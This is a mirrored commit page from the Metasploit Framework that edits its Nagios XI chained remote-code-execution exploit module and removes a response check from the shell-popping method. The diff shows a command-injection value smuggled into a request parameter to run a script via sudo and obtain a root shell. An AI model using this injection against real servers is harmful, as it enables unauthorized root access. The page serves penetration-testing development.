github/metasploit-framework
1
Fork 0
mirror of https://github.com/rapid7/metasploit-framework synced 2024-11-05 14:57:30 +01:00
Code Releases Activity

Fire and forget the shell

Browse Source 
Edge case where reverse_perl returns 302 when app is unconfigured.
This commit is contained in:
William Vu 2016-06-29 14:44:26 -05:00
parent 5f08591fef
commit 68bd4e2375
1 changed files with 1 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
modules/exploits/linux/http/nagios_xi_chained_rce.rb
View File

@ -212,7 +212,7 @@ class MetasploitModule < Msf::Exploit::Remote
end end
def pop_dat_shell def pop_dat_shell
res = send_request_cgi( send_request_cgi(
'method' => 'GET', 'method' => 'GET',
'uri' => '/nagiosxi/includes/components/perfdata/graphApi.php', 'uri' => '/nagiosxi/includes/components/perfdata/graphApi.php',
'cookie' => @admin_cookie, 'cookie' => @admin_cookie,
@ -221,10 +221,6 @@ class MetasploitModule < Msf::Exploit::Remote
'end' => ';sudo ../profile/getprofile.sh #' 'end' => ';sudo ../profile/getprofile.sh #'
} }
) )
if res && res.code != 200
fail_with(Failure::PayloadFailed, 'Failed to execute root shell! punt!')
end
end end
# #